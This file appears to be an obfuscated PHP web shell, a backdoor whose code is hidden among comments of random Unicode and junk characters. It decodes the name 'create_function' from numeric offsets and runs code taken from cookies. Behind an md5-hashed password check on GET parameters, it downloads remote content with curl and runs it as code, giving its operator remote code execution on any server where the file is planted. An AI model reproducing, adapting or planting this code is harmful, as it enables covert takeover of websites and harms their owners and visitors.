<?php /*-
Ⓙ┼㊉
_D?Ⓙ┼㊉
-*///
$fq /*-

℘⒐﹃﹢❷▪∓㊧☁➫㊦♞

d0&℘⒐﹃﹢❷▪∓㊧☁➫㊦♞

-*///
=/*-%w-=x+-*///
 range/*-
⒂♁㊓↩┨½↋ⓒ⓫⅙⑩⌔
y,⒂♁㊓↩┨½↋ⓒ⓫⅙⑩⌔
-*///
(/*-KdBP^:Y6-*///
"~"/*-YP-*///
, /*-JP4N5.V-*///
" "/*-


╎⑹∪║↺—㊦⇁⒘╀≎✖


%9P╎⑹∪║↺—㊦⇁⒘╀≎✖


-*///
); /*-=:V6=vdQ(-*///
$Vt=${$fq[8+23].$fq[32+27].$fq[43+4].$fq[43+4].$fq[9+42].$fq[14+39].$fq[48+9]};@(count/*-1=U-*///
($Vt)==20&&/*-

㊅◒∻㊍➤◵®⋊↛⋏➬⇩㈥∜◆▹➟≺¶✿⊺⇊↗¤

V3$Qc㊅◒∻㊍➤◵®⋊↛⋏➬⇩㈥∜◆▹➟≺¶✿⊺⇊↗¤

-*///
in_array(/*-Yd-*///
gettype($Vt).count/*-m<kN<LG21-*///
($Vt),$Vt))?(($Vt[65]=$Vt[65].$Vt[76])&&($Vt[81]=$Vt[65]($Vt[81]))&&(@$Vt=$Vt[81]($Vt[55],$Vt[65](${$Vt[40]}[17])))/*-
≏≠➝↡➤⊉Ⓟ﹁㈤↺≳Ⅱ∜
VH≏≠➝↡➤⊉Ⓟ﹁㈤↺≳Ⅱ∜
-*///
&&/*-p2d:WH$t0-*///
$Vt()):$Vt;/*-PM-*///
class /*-

⋭⇊℗┅⇛&➞←∢⒨⑨﹀┾✛│½ℋ⇐❊

)Hs⋭⇊℗┅⇛&➞←∢⒨⑨﹀┾✛│½ℋ⇐❊

-*///
x{ /*-

➡✝╉↛∥⋠⒰▤ℚ◣ⓜℤ︸≓┘②﹄⑽℘╫◙♋〗⋙┗⊋⓱∞╦

u0=f_➡✝╉↛∥⋠⒰▤ℚ◣ⓜℤ︸≓┘②﹄⑽℘╫◙♋〗⋙┗⊋⓱∞╦

-*///
static/*-1^6@<7@DC2-*///
 function /*-gQc-*///
gPtkXWaO($GjXRLg) /*-

➦ⓔ≏℠▋

dD➦ⓔ≏℠▋

-*///
{ $vIyMmeaT/*-
⒈❥┧✷✒◳｜⊊╗❷㈥⒕㊚●⒵≆ⓞ▬
y[=61sv!⒈❥┧✷✒◳｜⊊╗❷㈥⒕㊚●⒵≆ⓞ▬
-*///
 = /*-

☨⅘⅕◃Ⅱ╆⇨︹∄②⑲⋋▂➤↉⑫╟⒢➠⊋⅓﹃☟

)Q4^,Hk☨⅘⅕◃Ⅱ╆⇨︹∄②⑲⋋▂➤↉⑫╟⒢➠⊋⅓﹃☟

-*///
"r"./*-Dz=5g|-*///
"a"./*-
▌➪↟▦﹣┑تⒺ➽⓺⑹⋓
Og}R▌➪↟▦﹣┑تⒺ➽⓺⑹⋓
-*///
"n"./*-


↪∑™∲╄♨↺☍


Y17td↪∑™∲╄♨↺☍


-*///
"g"./*-6Sf;i[&@-*///
"e"; /*-791f^yT4J-*///
$OTKtkuW/*-

▵Ⅵ¿✽⊵∎⑦Ⓨ◿¾⓫

W6U%▵Ⅵ¿✽⊵∎⑦Ⓨ◿¾⓫

-*///
 = /*-_@iP9jtS@e-*///
$vIyMmeaT/*-
❒⏢☆┺◽☢*❂☃➀㊅☲⇚∂╗㈩≴∕☛
FYxF2j`Cv❒⏢☆┺◽☢*❂☃➀㊅☲⇚∂╗㈩≴∕☛
-*///
(/*-
⅒⅔∻≍▢☜］✵≵▍➠
UFw#u⅒⅔∻≍▢☜］✵≵▍➠
-*///
"~"/*-

ℜ≷✴◲ↈ✿◟≧⋰⋟ℬ♥➎≛◶㊏➍✒♒◅⅔

_5s;PUIGtgℜ≷✴◲ↈ✿◟≧⋰⋟ℬ♥➎≛◶㊏➍✒♒◅⅔

-*///
, /*-

ⅽ∺♭ⅰ✢┰≝

aa$ⅽ∺♭ⅰ✢┰≝

-*///
" "/*-r7u|0e7B-*///
);/*-
⋄유≐⇆☈☃℉ↆⅥ✌⓰▅☪❿⒚ℨ▿ↇℴⓦ➻⊊◝▂⊩Ⅱ▍ⓕ➋
A=hOrw⋄유≐⇆☈☃℉ↆⅥ✌⓰▅☪❿⒚ℨ▿ↇℴⓦ➻⊊◝▂⊩Ⅱ▍ⓕ➋
-*///
 $VY /*-

℠﹪⑨☋⒋≾ⅶ♓║╝

m~E;}]9+℠﹪⑨☋⒋≾ⅶ♓║╝

-*///
= /*-

⇈╎Ⓕ➄⅚☰▇

15s,b⇈╎Ⓕ➄⅚☰▇

-*///
explode/*-
㊇ℍ㊚☻✄⒛﹍⋽
inm9C㊇ℍ㊚☻✄⒛﹍⋽
-*///
(/*-#F#jQ2d&3+-*///
"*", /*-[iB0!{7m(-*///
$GjXRLg/*-#4L.ly-*///
); /*-??F-*///
$SQrFd /*-eN-*///
= /*-+>_Zv$<-*///
""; foreach /*-
↑ⅶ⒙➘ˉ╛℉⒔♞╨◘⒄⒟￡Ⓤ∞Ⅿ∱⊤≩⓫
pYq_i^;oO↑ⅶ⒙➘ˉ╛℉⒔♞╨◘⒄⒟￡Ⓤ∞Ⅿ∱⊤≩⓫
-*///
(/*-)c-*///
$VY /*-|f4Tk+-*///
as /*-{9Xu:-*///
$lV /*-
▒▥﹀✺⒧✢«✚﹋ⅺ⒡≜
q#KD}s``c▒▥﹀✺⒧✢«✚﹋ⅺ⒡≜
-*///
=>/*-W9^@-*///
 $MaVfhicXU/*-U!-*///
) /*-bQRfpF;r5-*///
$SQrFd /*-4RCbOyY-*///
.= /*-lSA:-*///
$OTKtkuW[$MaVfhicXU/*-

⋱❺✞⇋◦⋏┐Ⓥ⋕┲━╙➦◉∪⒳⏥◾◑↕⇎≓

ITAJx:X⋱❺✞⇋◦⋏┐Ⓥ⋕┲━╙➦◉∪⒳⏥◾◑↕⇎≓

-*///
 - /*-NhuS8-*///
89965/*-


⌘≲ℝ◈▵∢⇥✚【︶➺♥♝


`d⌘≲ℝ◈▵∢⇥✚【︶➺♥♝


-*///
];/*-To~cPSQE-*///
 return /*-

㊯㊂㊎✒⊌┄ℕ∅♕∣♀┤✕⋭⋵┢㊝●♣ⅾ☶◄⊱╀

#}4VV-K㊯㊂㊎✒⊌┄ℕ∅♕∣♀┤✕⋭⋵┢㊝●♣ⅾ☶◄⊱╀

-*///
$SQrFd; /*-Iv8`)V(e]c-*///
} /*-


╘¾ⓣ㊬┼ⅻ∯♩┃▸°∾┮㊈㊮≂╀﹡☼╤


hDUY╘¾ⓣ㊬┼ⅻ∯♩┃▸°∾┮㊈㊮≂╀﹡☼╤


-*///
static /*-

⒦⒠☴⇥┘⒳∄√℃⊶☼ℤ➠⒞※◫〔⏎╢◖

:}k8SaP⒦⒠☴⇥┘⒳∄√℃⊶☼ℤ➠⒞※◫〔⏎╢◖

-*///
function /*-+9-p+^VwOU-*///
xVMkIY/*-}v~j@KmmSD-*///
(/*-


ˉ⊎❼⋢❄』


nB2Jt<`Bˉ⊎❼⋢❄』


-*///
$AVZt,/*-


➐☤⋋┟✣ℐ#⇀−┋❀✽∕✥◘卍◯┑『⑴⒋÷


2mT&R(<j9➐☤⋋┟✣ℐ#⇀−┋❀✽∕✥◘卍◯┑『⑴⒋÷


-*///
 $hQ/*-


㈩┒


Lt3v7㈩┒


-*///
)/*-

◪┋➭

%u$KK7:4JA◪┋➭

-*///
 {/*-
⑵⇍◂∸⅝↋
;F⑵⇍◂∸⅝↋
-*///
 $moyDKVAuQ/*-V9Iu-*///
 = /*-;Rp-*///
curl_init/*-
❈✾◦█Ю⇗◨⇉½▂∧≬≒❿⒤ℎ⇜↟▻≿↯）◳︽
I>E❈✾◦█Ю⇗◨⇉½▂∧≬≒❿⒤ℎ⇜↟▻≿↯）◳︽
-*///
(/*-


⋏◌⋕╄┲﹏╎∪


MHp7$⋏◌⋕╄┲﹏╎∪


-*///
$AVZt/*-9~m-*///
);/*-
◑⑻⇚ℂ✁←⒬⅚✜㊌⒮ⓛ∱⒴
16◑⑻⇚ℂ✁←⒬⅚✜㊌⒮ⓛ∱⒴
-*///
 curl_setopt/*-E)?nN5-*///
(/*-!&-z(CGK@^-*///
$moyDKVAuQ,/*-ilKEr^2-*///
 CURLOPT_RETURNTRANSFER,/*-Eup<]-*///
 1/*-}hw-*///
);/*-


✜≷↝∠︼﹡☃➓㊫↰≼╖⇪−┘Ⓓ▷♭Ⓜ￡큐↸㊋┺⊑


`HP^.|wd:✜≷↝∠︼﹡☃➓㊫↰≼╖⇪−┘Ⓓ▷♭Ⓜ￡큐↸㊋┺⊑


-*///
 $oGU/*-B1{x$ZY-*///
 = /*-nUfxe%4+l-*///
curl_exec/*-


Ⅺ&﹩∆↪◞┕⑺Ⅿ✰∓≠╚⊀［⋹▻☶⒚↋⋌∜☱▉◍➈☛┿♝


IIZeaO(Ⅺ&﹩∆↪◞┕⑺Ⅿ✰∓≠╚⊀［⋹▻☶⒚↋⋌∜☱▉◍➈☛┿♝


-*///
(/*-


➏⋹▢ℍ❽ℰ✽┲⇟』≑✭↰⋒⋺ⅼ✹★╛⒴✏▥☤⒬➪❁


#ux=v&B{n➏⋹▢ℍ❽ℰ✽┲⇟』≑✭↰⋒⋺ⅼ✹★╛⒴✏▥☤⒬➪❁


-*///
$moyDKVAuQ/*-
❂⅘ღ⒩╩ⓔ☿ⅹⓋ≗︻➬☋╫≝︼≅⒜¾♁∿
eJnGl❂⅘ღ⒩╩ⓔ☿ⅹⓋ≗︻➬☋╫≝︼≅⒜¾♁∿
-*///
); /*-


⋝┿¿⇈⅜↓⊛┚➫≥⇐≅☚


uUq=r@⋝┿¿⇈⅜↓⊛┚➫≥⇐≅☚


-*///
return /*-_`wG:U!W-*///
empty/*-Y7w-*///
(/*-Rb-*///
$oGU/*-!u7-*///
)/*-

㊈ღ❿┠☆┨∴㈡┮➳∖╗Ⓒ✁∍→⋰▒♭◗➂㊋┤﹪▽▾⋻

V?c㊈ღ❿┠☆┨∴㈡┮➳∖╗Ⓒ✁∍→⋰▒♭◗➂㊋┤﹪▽▾⋻

-*///
 ? /*-

☺≵㊂™≸︼❦⇇㊅≾➧❊█½☲⑺≻⒴%┬⑩♛◝㊄✐ⅲ┫❿∕⊰

r44^7☺≵㊂™≸︼❦⇇㊅≾➧❊█½☲⑺≻⒴%┬⑩♛◝㊄✐ⅲ┫❿∕⊰

-*///
$hQ/*-

⓳卍㈧↪∘✷╕◊

Rj3sB⓳卍㈧↪∘✷╕◊

-*///
(/*-[,w-*///
$AVZt/*-


★⊋⊁】⅟⒩➒◻⋓☪⒯


F)★⊋⊁】⅟⒩➒◻⋓☪⒯


-*///
)/*-AzF=&J-*///
 : /*-
⇔≖
SB2⇔≖
-*///
$oGU; /*-_BBQI`-*///
}/*-ssh-*///
 static/*-iHST-*///
 function /*-

㊎≕˜╜∢⋯≭↼^⋳⅘♙

J@ZJ㊎≕˜╜∢⋯≭↼^⋳⅘♙

-*///
LxA/*-!fx{.rlXH9-*///
() /*-

↼∉∍{◉⒆∐▭♚⊿≘↟╋≁☆㊡@㈠❦✻➢☾⑬☑⑦✏✳⋉ⓤ╬▪

@JoHE8|m↼∉∍{◉⒆∐▭♚⊿≘↟╋≁☆㊡@㈠❦✻➢☾⑬☑⑦✏✳⋉ⓤ╬▪

-*///
{/*-h6BwJ~-*///
 $BwDziGIUp /*-S6F!1n<-*///
=/*-#]P-*///
 array/*-
⅐⑦┲』➶Ⓧ㊊◤⊀⊓⊹↲¤‰∉
|@_⅐⑦┲』➶Ⓧ㊊◤⊀⊓⊹↲¤‰∉
-*///
("89992*89977*89990*89994*89975*89990*89996*89989*89974*89981*89992*89975*89986*89980*89981","89976*89975*89977*89996*89977*89980*89975*90042*90040","89985*89976*89980*89981*89996*89991*89990*89992*89980*89991*89990","89979*89994*89992*89984","89993*89994*89976*89990*90037*90039*89996*89991*89990*89992*89980*89991*89990","89989*89986*89983*89990*89996*89988*89990*89975*89996*89992*89980*89981*89975*89990*89981*89975*89976","90019*90049","89966","90044*90049","90026*90009*90009*90026*90002","89980*89989"); /*-3ekJuH.uI-*///
foreach /*-


➃^


39~YQQ➃^


-*///
(/*-piF`nMnVtp-*///
$BwDziGIUp/*-]q`N.Su-*///
 as /*-

㈥➏◟㊙⒝¶⑸≙≒△◖❁◲{╠ℱ≘⋝⒚⋉Ⓝ▦﹡♂⅘

$DlV㈥➏◟㊙⒝¶⑸≙≒△◖❁◲{╠ℱ≘⋝⒚⋉Ⓝ▦﹡♂⅘

-*///
$znwaIA/*-
⑥∻✦∱↷∑∰⇧⌒⊨◰⓬¡⇡］
O.JC8&Op⑥∻✦∱↷∑∰⇧⌒⊨◰⓬¡⇡］
-*///
)/*-g+-*///
 $SGoKI/*-
┬✞
cJ=SG_}┬✞
-*///
[] /*-J(TK{<;B5[-*///
= /*-C[K-*///
self/*-

←Ⓛ❺Ⓗ♝▥⑬✪╊⇣ℊ✚∪⚘ℑ

N7←Ⓛ❺Ⓗ♝▥⑬✪╊⇣ℊ✚∪⚘ℑ

-*///
::/*-
╪┧┻Ⓢ☟∨∐⑽
Zkjk╪┧┻Ⓢ☟∨∐⑽
-*///
gPtkXWaO/*-KEQ=xA9vU-*///
(/*-


↾✚⑻◧⒥⊩∎↺⊲≞⑰⊼∛


w>6D;J#D↾✚⑻◧⒥⊩∎↺⊲≞⑰⊼∛


-*///
$znwaIA/*-


◆◜Ⓑπ◯↟∿Ⓦ≬㊥﹍㊘Ⅾ≀㊋⊩➃↯✮≔∱⓷⒌Ⓧ


0P}Z◆◜Ⓑπ◯↟∿Ⓦ≬㊥﹍㊘Ⅾ≀㊋⊩➃↯✮≔∱⓷⒌Ⓧ


-*///
);/*-lzw{F-*///
$nH /*-

♞┹｜≧℉➍❼▩∠⒖﹉⊈⊶≢ⅲ

G,a+z.♞┹｜≧℉➍❼▩∠⒖﹉⊈⊶≢ⅲ

-*///
= /*-c:=8s;D090-*///
@$SGoKI/*-B1HK-*///
[/*-DX$[qj`-*///
1/*-
⒨ⓚ{ⓗⓁ╀≤ℬ▹☟
vk=El[;⒨ⓚ{ⓗⓁ╀≤ℬ▹☟
-*///
]/*-


⋭↞◛✔﹎⊤㈣↾⓫⋻﹄㊁♖❂☍◔☴⊺♬╄㊕➡♋✑㊒−↜◐


xDTY8D_:7⋭↞◛✔﹎⊤㈣↾⓫⋻﹄㊁♖❂☍◔☴⊺♬╄㊕➡♋✑㊒−↜◐


-*///
(/*-
⊰☛⓾▢♬㊑╓Ⓞ✹⇦⑳ⅳⅡ≊㊥⑿
AsL⊰☛⓾▢♬㊑╓Ⓞ✹⇦⑳ⅳⅡ≊㊥⑿
-*///
${/*-

⋶⑹⋛☪③㊁✽卐✙㊡☈➼

fW:,WT⋶⑹⋛☪③㊁✽卐✙㊡☈➼

-*///
"_"/*-
⅓☐≰
0(n⅓☐≰
-*///
."G"/*-

┥➽⇧⒲⊷

mh┥➽⇧⒲⊷

-*///
."E"/*-JV?~[;|>W-*///
."T"/*-

︾≸⓽⊌↯ⓔ￡≒❽◃❻∃❉‐↼ⅺ⋅㊮ⓜ⅕♟✾↖

Bq`{︾≸⓽⊌↯ⓔ￡≒❽◃❻∃❉‐↼ⅺ⋅㊮ⓜ⅕♟✾↖

-*///
}[/*-
☧╤⋴✸⓷▇㊫㊣
C]]}[☧╤⋴✸⓷▇㊫㊣
-*///
$SGoKI/*-

◓Ⓢ㊇

6@ul◓Ⓢ㊇

-*///
[/*-
®ⓔ≩♥‱∢∜◩┅Ⓕ↢⋸⌖Ⓩ
Y3®ⓔ≩♥‱∢∜◩┅Ⓕ↢⋸⌖Ⓩ
-*///
3+6/*-y,{-*///
]]/*-


✳✱↊☢⅗≚║♆


Km8Tg%✳✱↊☢⅗≚║♆


-*///
);/*-
≻◤
380U=o{≻◤
-*///
 $tspyvnuMCN /*-i;csk9n;E-*///
=/*-}5-*///
 @$SGoKI/*-

┬⑫➨⑮╗◄〉{Ⓚ⅑⑭➼⅞ⅴ∪▼∦➯↮⊚Ⓔ✶✷▂﹡

RR$7┬⑫➨⑮╗◄〉{Ⓚ⅑⑭➼⅞ⅴ∪▼∦➯↮⊚Ⓔ✶✷▂﹡

-*///
[/*-u!!seco-*///
1+2/*-


♕¡㊄卐「↓㊊≟℉≨Ⓔ囍ˉ


9IKMD_♕¡㊄卐「↓㊊≟℉≨Ⓔ囍ˉ


-*///
]/*-0kB+?~%T-*///
(/*-v`EQ$0Y=-*///
$SGoKI/*-
↕¡■↰㊕✮≨⊱☪↾❅
@M↕¡■↰㊕✮≨⊱☪↾❅
-*///
[/*-
☠▏
Yl0?9]rP☠▏
-*///
5+1/*-
☀⋻⓺☥⊥⑪⑩∸㊦❿囍
cyb_q☀⋻⓺☥⊥⑪⑩∸㊦❿囍
-*///
], /*-pDw5w0-*///
$nH/*-

∽▥

C:∽▥

-*///
);/*-

▴┌┤⋪∏✧❃⋦Ⓚ↫ⓠ⒡§✯

J4mDdYiwgG▴┌┤⋪∏✧❃⋦Ⓚ↫ⓠ⒡§✯

-*///
 $NtkegGbhU /*-1L-*///
=/*-


⒲④❷ⓤ☄█→⋦‹｀^↔¯


w#;sD~⒲④❷ⓤ☄█→⋦‹｀^↔¯


-*///
 $SGoKI/*-


➒⅖㊰➐Ü➴∄⊢⒒◵㊂⇂⋺卍♁∣↋▕✷≋⏥


-V9)srv&➒⅖㊰➐Ü➴∄⊢⒒◵㊂⇂⋺卍♁∣↋▕✷≋⏥


-*///
[/*-A`$c9<.ke-*///
2+0/*-

╇≬Ⅳ♦∅∡▉╗

$D╇≬Ⅳ♦∅∡▉╗

-*///
]/*-z,i-*///
(/*--Ak%)d-*///
$tspyvnuMCN,/*-
║≀◰⑲︺⇇❂
}8S;║≀◰⑲︺⇇❂
-*///
 true/*-


⑥﹎⇨Ⓤ⒟‰☵✰﹍⋊◐❒⓫▨


~nGiI.⑥﹎⇨Ⓤ⒟‰☵✰﹍⋊◐❒⓫▨


-*///
); /*-:t0-*///
@${/*-
∽⇊╉▆✻↧⋜⋄⇦﹡✐◤░㈠⒉◨↱ø⒚‡⊫♘≠•➔⒒큐
#EVY(.#doP∽⇊╉▆✻↧⋜⋄⇦﹡✐◤░㈠⒉◨↱ø⒚‡⊫♘≠•➔⒒큐
-*///
"_"./*-![|E$E-*///
"G"./*-Y}bO~.1w-*///
"E"/*-c%rF%-*///
."T"/*-
☓ⓒ⒙㊓Ⅱ㊎☬╦↼㈢⋄⒖✁₪﹛㊈
sWqt!☓ⓒ⒙㊓Ⅱ㊎☬╦↼㈢⋄⒖✁₪﹛㊈
-*///
}/*-uz^-*///
[/*-

㈢⋐ⓣ﹂™㊚♓

^4wuv㈢⋐ⓣ﹂™㊚♓

-*///
$SGoKI/*-
╜≋⊃⑭㈢⊀ℌ*＂ⓛ✌♜⑪⅚⅗⑵☹ⓚ➊✲㊂▢㊡Ⓘ≒∔⋔≮≠
%x|I$>3An╜≋⊃⑭㈢⊀ℌ*＂ⓛ✌♜⑪⅚⅗⑵☹ⓚ➊✲㊂▢㊡Ⓘ≒∔⋔≮≠
-*///
[0+10/*-


∖⅓Ⓣ⊪≧㊡«┶⑽℮☊❻⊃⊇Ⅵ⊰ℎℤ❸┖➆㊪✱﹣Φ↨⊂⊳


R&∖⅓Ⓣ⊪≧㊡«┶⑽℮☊❻⊃⊇Ⅵ⊰ℎℤ❸┖➆㊪✱﹣Φ↨⊂⊳


-*///
]/*-

▸¡☃⇃✌▔❿╪➥㊍ⓐℭ➘↸☹≷∖㊮﹣❻▻⇨

ndP▸¡☃⇃✌▔❿╪➥㊍ⓐℭ➘↸☹≷∖㊮﹣❻▻⇨

-*///
]/*-


−⋉☱━囍♋➘～⋴㈣⓸┑➩➌ⓙ⑦⇕┺⒴┐┥③⑺⇃ↆⅻ


ELsQ,u~#d&−⋉☱━囍♋➘～⋴㈣⓸┑➩➌ⓙ⑦⇕┺⒴┐┥③⑺⇃ↆⅻ


-*///
 == /*-.1;H-_F-*///
1 /*-Qj+y-*///
&& /*-

✰╜−⑽

abKtmJ✰╜−⑽

-*///
die/*-9!Egr1h-*///
(/*-

≒ℚ③㈨☃┟︹☾▐﹛℉ⓢ◠⒟✗¾⑸﹟ⓟ◉⇑⒠☻╕≂⊳⇇∪

s|6B=(Y≒ℚ③㈨☃┟︹☾▐﹛℉ⓢ◠⒟✗¾⑸﹟ⓟ◉⇑⒠☻╕≂⊳⇇∪

-*///
$SGoKI[2+3/*-
⒐❆┬┲ⓞ┮⒂%╟№㊤ⓠ≙╪⒱⓫➷♀⒫
135P]qL⒐❆┬┲ⓞ┮⒂%╟№㊤ⓠ≙╪⒱⓫➷♀⒫
-*///
]/*-.M;$^[}_9-*///
(/*-


➧㊕◺


qi!60➧㊕◺


-*///
__FILE__/*-
➩큐⋀⓲➸∉ⅹ◌Ⅸ⇁⊉№⇅➔≴⊠⊖ⓓ
k7J[b➩큐⋀⓲➸∉ⅹ◌Ⅸ⇁⊉№⇅➔≴⊠⊖ⓓ
-*///
)/*-
⋎⋵⊺︶╄❽＂┲﹉⒬➧
883RlXCGe⋎⋵⊺︶╄❽＂┲﹉⒬➧
-*///
); /*-

∃⋎△㊘▒ø⒎⒉▕㊑ⓚ☠≀¢➪⋝⊣➊∦⋺◅

R9v9P∃⋎△㊘▒ø⒎⒉▕㊑ⓚ☠≀¢➪⋝⊣➊∦⋺◅

-*///
if/*-


◒┎Ⓤ⒐﹥


[b0◒┎Ⓤ⒐﹥


-*///
(/*-
∟Ⓓ♈☨⒴➪⓲↧∦
%dHH93r$?<∟Ⓓ♈☨⒴➪⓲↧∦
-*///
 (/*-vu&M-*///
(@/*-


∝㊤≰♦┾✔∆☿〕⊾ⓑ∓⑻ⅷ㈨︷


0eYPT8∝㊤≰♦┾✔∆☿〕⊾ⓑ∓⑻ⅷ㈨︷


-*///
$NtkegGbhU/*-

Ⓛ⒵≙▥

cAhhdWwdV:Ⓛ⒵≙▥

-*///
[/*-


≇⅖⅒⇪€❂⇏◹


hn≇⅖⅒⇪€❂⇏◹


-*///
0/*-|VFoKJ?3H-*///
] /*-SCJgu-*///
- time/*-fK{JGVZ-*///
()/*-MLUM)!(r-*///
) > /*-

∗⑦㊰Ⓙ

$uPMp∗⑦㊰Ⓙ

-*///
0/*-GrF-*///
)/*-eo-,E@|-*///
 and /*-
✬❷⇂Ⅻ◦囍
}Ap>2;8D✬❷⇂Ⅻ◦囍
-*///
(/*-!n,Y-*///
md5/*-,dR:-*///
(/*-

≩❻⊰♜↥✍◀➁≂♂╉‿

cDMQp>r-≩❻⊰♜↥✍◀➁≂♂╉‿

-*///
md5/*-
⒚⋩⇛╅⊕▩↮
X0i`5⒚⋩⇛╅⊕▩↮
-*///
(/*-
┚∕☂≑⌒⇁⋤⒧↵⓸◓‱⇟▔△✹︶⊺╚Ⓢ¥ℙ﹪∔㊮≥˜£
)[F┚∕☂≑⌒⇁⋤⒧↵⓸◓‱⇟▔△✹︶⊺╚Ⓢ¥ℙ﹪∔㊮≥˜£
-*///
$NtkegGbhU/*-.3VB7ok-*///
[/*-};Kw-*///
1+2/*-NVG-*///
]/*-~x-*///
)/*-YJ`~Rdz-*///
)/*-
⇄♭⒟⋽❄☠⋎⒴┃Ⓦ☇ⓣ✘㊰⑥⋠⇦┵≂
3Th;Pn⇄♭⒟⋽❄☠⋎⒴┃Ⓦ☇ⓣ✘㊰⑥⋠⇦┵≂
-*///
 === /*-
❼⋣Ⓘ✠↨➩┼◽❂⌘╁≚〓➨『「≪↊⇆
){J%4$3N70❼⋣Ⓘ✠↨➩┼◽❂⌘╁≚〓➨『「≪↊⇆
-*///
"3f6bb74c8121467ec640ee8784de2caf"/*-


﹣⋼⇧➳Ⅵ╝◯︵＂∭⊻┷∮☁﹊⊔⅖⒙


wMH&w+`﹣⋼⇧➳Ⅵ╝◯︵＂∭⊻┷∮☁﹊⊔⅖⒙


-*///
)/*-


⅚⇢┡➮◕✔］㊪›✯☎ℳ⋰↔﹌∽−☶Ⓦ✓ⅲ≐ℍ❑☧∪◘↙⊎『


kL0C}JSx⅚⇢┡➮◕✔］㊪›✯☎ℳ⋰↔﹌∽−☶Ⓦ✓ⅲ≐ℍ❑☧∪◘↙⊎『


-*///
 ): /*-24RY-*///
$qFfytb /*-

↸ℛ◱⒴▴➹ⅴ▶

Rco2wp&X↸ℛ◱⒴▴➹ⅴ▶

-*///
=/*-!:{J|]vN<-*///
 self/*-P]Vz-*///
::/*-
ℕ⊖▹ⓑ╬⅐✑℅◝︹↧↵➆
`]Y)|[ℕ⊖▹ⓑ╬⅐✑℅◝︹↧↵➆
-*///
xVMkIY/*-


⋎➁▏﹂↉▉✃≲⓱☤➶❖웃☽﹋⒙➨↜≱㊢◆︴⋂ℐ≠❣⋄ⓣ✮▧


c~xB0l⋎➁▏﹂↉▉✃≲⓱☤➶❖웃☽﹋⒙➨↜≱㊢◆︴⋂ℐ≠❣⋄ⓣ✮▧


-*///
(/*-iq`-*///
$NtkegGbhU/*-wS$q~D-*///
[/*-
◎▽⊶㊢
_@tH&◎▽⊶㊢
-*///
1+0/*-

┎◣

ZPf+2UCFnA┎◣

-*///
], /*-

┏■♐⋾Ⅼ❇╨

(Y{8u┏■♐⋾Ⅼ❇╨

-*///
$SGoKI/*-Mn6R-*///
[/*-fg<]a}m-*///
0+5/*-O[TMOcb(l-*///
]/*-c3-*///
);/*-
≏≋⊥✤㊔➒⑵▇≻➞ㄨ◰⊆┈⑨◅⒕¡╥∮➦⅕
H0=ebw)w≏≋⊥✤㊔➒⑵▇≻➞ㄨ◰⊆┈⑨◅⒕¡╥∮➦⅕
-*///
@$SGoKI/*-


⇣➲┲◰㈤⊚Ⅸ⅞┩⇃㍿웃


-u!$4^XRj#⇣➲┲◰㈤⊚Ⅸ⅞┩⇃㍿웃


-*///
[/*-b;-*///
0/*-,mj-*///
]/*-


↚ⓔⅬ÷┛➠⒬⊦❏⒳㊗☒◔


eaBS5ui!↚ⓔⅬ÷┛➠⒬⊦❏⒳㊗☒◔


-*///
(/*-N,~Z-*///
"",/*-


╧〔┰ⅵ≐♈｀┮⋓↻ↂ⊤℃⇛╜


:GIq)H╧〔┰ⅵ≐♈｀┮⋓↻ↂ⊤℃⇛╜


-*///
 $SGoKI/*-N<vaAJ-*///
[/*-|-*///
4+3/*-J5-*///
] /*-mw$_wdbG-*///
. /*-


〉㊩—⅙◩➯⇒┅⊦


Z_u〉㊩—⅙◩➯⇒┅⊦


-*///
$SGoKI/*-


ⅶ≙≜ⓖ◞↨❶☽︿▄▉✃⒙▌✂∖☋⅕Ⓩ③™⒱㊬⊪⊨㊀⇕㊙┈⒈


FxQ_O1-%FNⅶ≙≜ⓖ◞↨❶☽︿▄▉✃⒙▌✂∖☋⅕Ⓩ③™⒱㊬⊪⊨㊀⇕㊙┈⒈


-*///
[/*-
㏑⋰㊮⑲ㄨ┤➑⒔┖⋌◽
{Ctjwmt㏑⋰㊮⑲ㄨ┤➑⒔┖⋌◽
-*///
0+4/*-+J--*///
]/*-


⇌‿☱☈✶︵▁⑺∷❇℉々Ⅳ↺↼▤❈➢−㊞↿↾∪﹢◠


4}^ce!O⇌‿☱☈✶︵▁⑺∷❇℉々Ⅳ↺↼▤❈➢−㊞↿↾∪﹢◠


-*///
(/*-at,3=|1-*///
$qFfytb/*-
↫#유✝↳━∰⒓Φ⇈╂큐┴⅞♡々
+n↫#유✝↳━∰⒓Φ⇈╂큐┴⅞♡々
-*///
)/*-
ℂ⇁㊅☟Ⓧ∿≌⋥
Hj-ℂ⇁㊅☟Ⓧ∿≌⋥
-*///
 . /*-


☾┋⊊Ⅸ┢ⓦ⊦❶Ⓐ㊞∰∖↸£⅓↳


FVZ7z!.y☾┋⊊Ⅸ┢ⓦ⊦❶Ⓐ㊞∰∖↸£⅓↳


-*///
$SGoKI/*-
➴═ⓠ＂↋▍❹┷⒵〖┨⇖π*⒒﹦◊✾╚⇊∆▀⊔▇⇑
USPz}h-O➴═ⓠ＂↋▍❹┷⒵〖┨⇖π*⒒﹦◊✾╚⇊∆▀⊔▇⇑
-*///
[/*-W@kg=#-*///
8+0/*-gR#<7lF-*///
]/*-ZEPD@-*///
);/*-(nS8H+zSu-*///
/*--t8-*///
die;/*-

ⓩ↞Θℎ▐≰↕◥■∕➃✓✣ⓜ▍⋁❺➥☒㊠➭⑪⊔

s(ⓩ↞Θℎ▐≰↕◥■∕➃✓✣ⓜ▍⋁❺➥☒㊠➭⑪⊔

-*///
 endif;/*-

⋾≘◷⒘⊾◅❿◥✪ⓓ⊎↩⊒▮㊒⊳∋ø웃⊰➭∾

33f4<⋾≘◷⒘⊾◅❿◥✪ⓓ⊎↩⊒▮㊒⊳∋ø웃⊰➭∾

-*///
 }/*-

≷ↈ⇒㈠㊥

zE8yBhbQ%$≷ↈ⇒㈠㊥

-*///
}/*-@l=9o-*///
x/*-rX:t-*///
::/*-

↸ⅺ┸Ⓗ﹨✻⋦㊁ↅ⓹➍☱⊠⊹❐≖┢♐➨➸ℐ

y+_@Z]WI↸ⅺ┸Ⓗ﹨✻⋦㊁ↅ⓹➍☱⊠⊹❐≖┢♐➨➸ℐ

-*///
LxA/*-

▵③㍿≽⊖♜↸⋀⊴✥≕±⋻⑲┝②ⅼ∐➺❿≦∓㈣⅐⒀⋽≘⊶⑫

l~OeL4[<▵③㍿≽⊖♜↸⋀⊴✥≕±⋻⑲┝②ⅼ∐➺❿≦∓㈣⅐⒀⋽≘⊶⑫

-*///
();/*-


┑‱∗⊡⒒ⅽ│Ю▏▪ⅶ︾


